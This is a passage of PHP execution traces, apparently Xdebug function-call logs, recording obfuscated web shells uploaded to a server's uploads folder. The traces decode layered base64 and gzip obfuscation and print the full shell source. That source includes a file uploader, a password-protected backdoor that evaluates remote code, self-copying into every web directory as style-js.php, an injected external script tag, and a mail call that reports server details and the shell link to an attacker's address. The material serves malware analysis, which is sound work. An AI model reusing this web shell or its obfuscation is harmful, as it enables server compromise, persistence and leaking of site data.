3		A						/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	14	$a = '<?php\r\n\r\n$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";\r\n$gzinflate = "=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJcosuAHEtpAim'
3		A						/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	33	$doc = '/var/www/html'
4	19	0	0.001730	424392	scandir	0		/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	34	1	'/var/www/html'
4	19	1	0.001760	424896
4	19	R			[0 => '.', 1 => '..', 2 => 'uploads']
3		A						/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	34	$dir = [0 => '.', 1 => '..', 2 => 'uploads']
3		A						/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	35	$d1 = '/var/www/html/.'
3		A						/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	36	$d2 = '/var/www/html/..'
4	20	0	0.001815	424952	array_search	0		/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	37	2	'.'	[0 => '.', 1 => '..', 2 => 'uploads']
4	20	1	0.001832	425024
4	20	R			0
3		A						/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	37	$key = 0
4	21	0	0.001857	424920	array_search	0		/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	40	2	'..'	[1 => '..', 2 => 'uploads']
4	21	1	0.001874	424992
4	21	R			1
3		A						/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	40	$key = 1
4	22	0	0.001902	424888	array_search	0		/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	43	2	'/var/www/html/.'	[2 => 'uploads']
4	22	1	0.001918	424960
4	22	R			FALSE
3		A						/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	43	$key = FALSE
4	23	0	0.001942	424888	array_search	0		/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	46	2	'/var/www/html/..'	[2 => 'uploads']
4	23	1	0.001957	424960
4	23	R			FALSE
3		A						/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	46	$key = FALSE
4	24	0	0.001981	424912	array_push	0		/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	49	2	[2 => 'uploads']	'/var/www/html'
4	24	1	0.001996	424976
4	24	R			2
3		A						/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	51	$p = '/var/www/html/uploads'
4	25	0	0.002020	424960	is_dir	0		/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	52	1	'/var/www/html/uploads'
4	25	1	0.002037	425024
4	25	R			TRUE
3		A						/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	53	$file = '/var/www/html/uploads/style-js.php'
4	26	0	0.002062	425048	touch	0		/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	54	1	'/var/www/html/uploads/style-js.php'
4	26	1	0.002099	425088
4	26	R			TRUE
4	27	0	0.002113	425048	fopen	0		/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	55	2	'/var/www/html/uploads/style-js.php'	'w'
4	27	1	0.002144	425712
4	27	R			resource(5) of type (stream)
3		A						/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	55	$folder = resource(5) of type (stream)
4	28	0	0.002172	425640	fwrite	0		/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	56	2	resource(5) of type (stream)	'<?php\r\n\r\n$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";\r\n$gzinflate = "=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJcosuAHEtpAim'
4	28	1	0.002208	425704
4	28	R			894
3		A						/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	51	$p = '/var/www/html//var/www/html'
4	29	0	0.002241	425648	is_dir	0		/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	52	1	'/var/www/html//var/www/html'
4	29	1	0.002260	425688
4	29	R			FALSE
3		A						/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	64	$a = 'hacklinksatis@gmail.com'
3		A						/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	65	$b = 'upload script'
3		A						/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	66	$c = 'Dosya Yolu : /var/www/html\r\n'
3		A						/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	68	$c .= 'Server Admin : webmaster@localhost\r\n'
3		A						/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	70	$c .= 'Server isletim sistemi : Apache/2.4.52 (Ubuntu)\r\n'
3		A						/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	72	$c .= 'Shell Link : http://localhost/uploads/upp.php\r\n'
3		A						/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	74	$c .= 'Avlanan Site : localhost\r\n'
4	30	0	0.002363	425872	mail	0		/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	76	3	'hacklinksatis@gmail.com'	'upload script'	'Dosya Yolu : /var/www/html\r\nServer Admin : webmaster@localhost\r\nServer isletim sistemi : Apache/2.4.52 (Ubuntu)\r\nShell Link : http://localhost/uploads/upp.php\r\nAvlanan Site : localhost\r\n'
4	30	1	0.003271	425968
4	30	R			FALSE
3	15	1	0.003295	425872
2	7	1	0.003304	407120
			0.003387	324528
TRACE END   [2023-02-12 20:56:12.254035]

data/traces/c61b501340d047ae37bf04d114d9fa20_trace-1676245140.8977.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:39:26.795506]
1	0	1	0.000212	393528
1	3	0	0.000280	396968	{main}	1		/var/www/html/uploads/Up.php.html	0	0
1		A						/var/www/html/uploads/Up.php.html	3	$gz = 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=='
1		A						/var/www/html/uploads/Up.php.html	4	$gzinflate = 'O3gvY0lh+owA/d9r1rcLg9tNAnwU0iX9PyUvNOn+NuRSz7rvZzwJACPMsp6z9tlfzu+XI9i6En+VFFC/B+kumtsZQHLhsh3D6PIKaqjnDTyZnzliSw0euoDiB7gqnevZdq2V/wvbd+eH0V8IWsRhQYOmPXDi+9DRYFcPUewVJDKO9JMiFBftj7ugDILfWjy4z3UHsKUffh4FGYXXR4EYgz1Lp4AoI064w6KAa7STRnPX+uOEVwOJ2S3CDYtEAweOhcHHV+dQcihBPzBQchgZGFBRS+ygKxmlQApKCQHMmIb5mf4H+WkjLYhwsSkSK3RD1Kb0bJ+tQkV9s4FQ/0ilegHCWxXavd5JaU+ym/bqWu4XvMhlsfGJ52PG3JUdigwJtc6mI18KJHsGeeVnH2G3A7rX2FdioAa7/ocUkfFwCDAJRsAaB8hUIv5xL4DhOSs1NwxnY++85YY/H9XxLezH/T9T9b1junxxy5SKiig9yK4ravKAzGhY8VidRF5zJfmk'
2	4	0	0.000346	396968	base64_decode	0		/var/www/html/uploads/Up.php.html	5	1	'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=='
2	4	1	0.000414	397256
2	4	R			'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24gzinflate%29%29%29%29%29%29%29%29%3B'
2	5	0	0.000436	397224	urldecode	0		/var/www/html/uploads/Up.php.html	5	1	'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24gzinflate%29%29%29%29%29%29%29%29%3B'
2	5	1	0.000456	397480
2	5	R			'eval(&quot;?&gt;&quot;.gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	6	0	0.000475	397192	htmlspecialchars_decode	0		/var/www/html/uploads/Up.php.html	5	1	'eval(&quot;?&gt;&quot;.gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	6	1	0.000501	397416
2	6	R			'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	7	0	0.000533	399544	eval	1	'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'	/var/www/html/uploads/Up.php.html	5	0
3	8	0	0.000551	399544	strrev	0		/var/www/html/uploads/Up.php.html(5) : eval()'d code	1	1	'O3gvY0lh+owA/d9r1rcLg9tNAnwU0iX9PyUvNOn+NuRSz7rvZzwJACPMsp6z9tlfzu+XI9i6En+VFFC/B+kumtsZQHLhsh3D6PIKaqjnDTyZnzliSw0euoDiB7gqnevZdq2V/wvbd+eH0V8IWsRhQYOmPXDi+9DRYFcPUewVJDKO9JMiFBftj7ugDILfWjy4z3UHsKUffh4FGYXXR4EYgz1Lp4AoI064w6KAa7STRnPX+uOEVwOJ2S3CDYtEAweOhcHHV+dQcihBPzBQchgZGFBRS+ygKxmlQApKCQHMmIb5mf4H+WkjLYhwsSkSK3RD1Kb0bJ+tQkV9s4FQ/0ilegHCWxXavd5JaU+ym/bqWu4XvMhlsfGJ52PG3JUdigwJtc6mI18KJHsGeeVnH2G3A7rX2FdioAa7/ocUkfFwCDAJRsAaB8hUIv5xL4DhOSs1NwxnY++85YY/H9XxLezH/T9T9b1junxxy5SKiig9yK4ravKAzGhY8VidRF5zJfmk'
3	8	1	0.000578	402136
3	8	R			'AR8G4PkBGgbl+QEVBur5eJwBCgb1+XictVb7b+I4EP59pf0fsjkkqLrXhHe7LV3CIwSWV3kUQlUhx3FIwHk0NlA47f9+dlJa2u7urXR3ERa2v5lvxuPx2FdfAzv4+AGFoR/OQxT4IXW8RUo+uWST0PaF5BV1KEbX4wD7wEThlRSPky8CEHkUhddXlu9RAfrYD0viH+m0JVtZkc+GrgAgdXyvJIqCi6jtmyUx8AkVBeRBugtQSXTXmDoBCKnE5f80AQWi4AGXQesny6LgmEej6yvpyfAPXHG8YE2FmNpyMDpwxX3i7Fk/L4sHwRicM27xSYmsDdehscl4fgPwmgFxHLh17mj059HrqyNXHCslJOb93nB0l+SqyXuhVBIOisKJ8FckU4Z+sEsl5mqzXR/eJblnyfu7JHWDOXcnef9ZeAfGwAmjEN4s2Di0n2zDuN/uKTVhOK5W68Php4PbkvESxgNH8lL4zgKKCfp9M1Y2zb5nM6rC/K79hhX2+3r98cNV'
3	9	0	0.000605	402104	base64_decode	0		/var/www/html/uploads/Up.php.html(5) : eval()'d code	1	1	'AR8G4PkBGgbl+QEVBur5eJwBCgb1+XictVb7b+I4EP59pf0fsjkkqLrXhHe7LV3CIwSWV3kUQlUhx3FIwHk0NlA47f9+dlJa2u7urXR3ERa2v5lvxuPx2FdfAzv4+AGFoR/OQxT4IXW8RUo+uWST0PaF5BV1KEbX4wD7wEThlRSPky8CEHkUhddXlu9RAfrYD0viH+m0JVtZkc+GrgAgdXyvJIqCi6jtmyUx8AkVBeRBugtQSXTXmDoBCKnE5f80AQWi4AGXQesny6LgmEej6yvpyfAPXHG8YE2FmNpyMDpwxX3i7Fk/L4sHwRicM27xSYmsDdehscl4fgPwmgFxHLh17mj059HrqyNXHCslJOb93nB0l+SqyXuhVBIOisKJ8FckU4Z+sEsl5mqzXR/eJblnyfu7JHWDOXcnef9ZeAfGwAmjEN4s2Di0n2zDuN/uKTVhOK5W68Php4PbkvESxgNH8lL4zgKKCfp9M1Y2zb5nM6rC/K79hhX2+3r98cNV'
3	9	1	0.000635	404696
3	9	R			'\001\037\006�\001\032\006�\001\025\006�x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G'
3	10	0	0.000710	402104	gzinflate	0		/var/www/html/uploads/Up.php.html(5) : eval()'d code	1	1	'\001\037\006�\001\032\006�\001\025\006�x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G'
3	10	1	0.000788	403928
3	10	R			'\001\032\006�\001\025\006�x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3'
3	11	0	0.000860	401336	gzinflate	0		/var/www/html/uploads/Up.php.html(5) : eval()'d code	1	1	'\001\032\006�\001\025\006�x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3'
3	11	1	0.000928	403160
3	11	R			'\001\025\006�x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3V6;g3�����\0'
3	12	0	0.000998	401336	gzinflate	0		/var/www/html/uploads/Up.php.html(5) : eval()'d code	1	1	'\001\025\006�x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3V6;g3�����\0'
3	12	1	0.001065	403160
3	12	R			'x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3V6;g3�����\025��z���U��e�\'
3	13	0	0.001134	401336	gzuncompress	0		/var/www/html/uploads/Up.php.html(5) : eval()'d code	1	1	'x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3V6;g3�����\025��z���U��e�\'
3	13	1	0.001202	403160
3	13	R			'x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3V6;g3�����\025��z���U��e�\bay2\'�eB��`��'
3	14	0	0.001279	401336	gzuncompress	0		/var/www/html/uploads/Up.php.html(5) : eval()'d code	1	1	'x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3V6;g3�����\025��z���U��e�\bay2\'�eB��`��'
3	14	1	0.001372	405464
3	14	R			'<?php\r\nerror_reporting(0);\r\necho \'<title>Uploader</title>\';\r\necho \'<center><font color="#11f0f3"><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"></center>\';\r\necho \'<center><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></font><center>\';\r\nif( $_POST[\'_upl\'] == "Upload" ) {\r\nif(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<center><br><br><b><font color="#11f'
3	15	0	0.001504	423664	eval	1	'?><?php\r\nerror_reporting(0);\r\necho \'<title>Uploader</title>\';\r\necho \'<center><font color="#11f0f3"><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"></center>\';\r\necho \'<center><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></font><center>\';\r\nif( $_POST[\'_upl\'] == "Upload" ) {\r\nif(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<center><br><br><b><font color="#11f0f3">UPLOAD SUCCESS!</font></b></center><br><br>\'; }\r\nelse { echo \'<center><br><br><b><font color="#f31111">UPLOAD FAILED!</font></b></center><br><br>\'; }\r\n}\r\n?>\r\n<?php\r\n@session_start();\r\n@error_reporting(0);\r\n$a = \'<?php\r\n\r\n$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";\r\n$gzinflate = "=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJcosuAHEtpAimJmdmoFCB2NZlgqVobRLXemwlekB8PSBazZLFbIHPfRsqapn5Z2WFCGLcWb5Ls9hJahXA7YV+RHfRiYvgTQpUFHyk8tcxG2ovhQOTquhQ66yaMV9H6FEhemC6vu7woIlYFCFlmOADdmcnyI39588cbGYIw42qSs//TI4HhYD0z0ItUW6T0Zs4GozL1SjnL3tNWA5gc9D9v0HFwI8adFVbcin/sGwUBwJe+HaAeFg/cGwYB4/lBgWA";\r\neval(htmlspecialchars_decode(urldecode(base64_decode($gz))));\r\n\r\n?>\r\n<form action="" method="post">\r\n<input type="text" name="p">\r\n</form>\r\n\';\r\nif (@$_REQUEST["px"]) {\r\n    $p = @$_REQUEST["px"];\r\n    $pa = md5(sha1($p));\r\n    if ($pa == "7e2cb042f3fd80e5a826735222585fde") {\r\n        echo eval(@file_get_contents(@$_REQUEST["404"]));\r\n    }\r\n}\r\nif (@!$_SESSION["sdm"]) {\r\n    $doc = $_SERVER["DOCUMENT_ROOT"];\r\n    $dir = scandir($doc);\r\n    $d1 = \'\' . $doc . \'/.\';\r\n    $d2 = \'\' . $doc . \'/..\';\r\n    if (($key = @array_search(\'.\', $dir)) !== false) {\r\n        unset($dir[$key]);\r\n    }\r\n    if (($key = @array_search(\'..\', $dir)) !== false) {\r\n        unset($dir[$key]);\r\n    }\r\n    if (($key = @array_search($d1, $dir)) !== false) {\r\n        unset($dir[$key]);\r\n    }\r\n    if (($key = array_search($d2, $dir)) !== false) {\r\n        unset($dir[$key]);\r\n    }\r\n    @array_push($dir, $doc);\r\n    foreach ($dir as $d) {\r\n        $p = $doc . "/" . $d;\r\n        if (is_dir($p)) {\r\n            $file = $p . "/style-js.php";\r\n            @touch($file);\r\n            $folder = @fopen($file, "w");\r\n            @fwrite($folder, $a);\r\n        }\r\n    }\r\n   \r\n}\r\n?>\r\n<script src=http://teledramasinhala.com/img/icons/image.js></script>\r\n<?php\r\n$a = "hacklinksatis@gmail.com";\r\n$b = "upload script";\r\n$c = "Dosya Yolu : " . $_SERVER[\'DOCUMENT_ROOT\'] . "\r\n";\r\n$c.= "Server Admin : " . $_SERVER[\'SERVER_ADMIN\'] . "\r\n";\r\n$c.= "Server isletim sistemi : " . $_SERVER[\'SERVER_SOFTWARE\'] . "\r\n";\r\n$c.= "Shell Link : http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'PHP_SELF\'] . "\r\n";\r\n$c.= "Avlanan Site : " . $_SERVER[\'HTTP_HOST\'] . "\r\n";\r\nmail($a, $b, $c);\r\n?>'	/var/www/html/uploads/Up.php.html(5) : eval()'d code	1	0
4	16	0	0.001586	423664	error_reporting	0		/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	2	1	0
4	16	1	0.001602	423704
4	16	R			22527
4	17	0	0.001619	423664	session_start	0		/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	12	0
4	17	1	0.001676	424416
4	17	R			TRUE
4	18	0	0.001692	424416	error_reporting	0		/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	13	1	0
4	18	1	0.001707	424456
4	18	R			0
3		A						/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	14	$a = '<?php\r\n\r\n$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";\r\n$gzinflate = "=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJcosuAHEtpAim'
3		A						/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	33	$doc = '/var/www/html'
4	19	0	0.001762	424416	scandir	0		/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	34	1	'/var/www/html'
4	19	1	0.001792	424920
4	19	R			[0 => '.', 1 => '..', 2 => 'uploads']
3		A						/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	34	$dir = [0 => '.', 1 => '..', 2 => 'uploads']
3		A						/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	35	$d1 = '/var/www/html/.'
3		A						/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	36	$d2 = '/var/www/html/..'
4	20	0	0.001847	424976	array_search	0		/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	37	2	'.'	[0 => '.', 1 => '..', 2 => 'uploads']
4	20	1	0.001864	425048
4	20	R			0
3		A						/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	37	$key = 0
4	21	0	0.001889	424944	array_search	0		/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	40	2	'..'	[1 => '..', 2 => 'uploads']
4	21	1	0.001910	425016
4	21	R			1
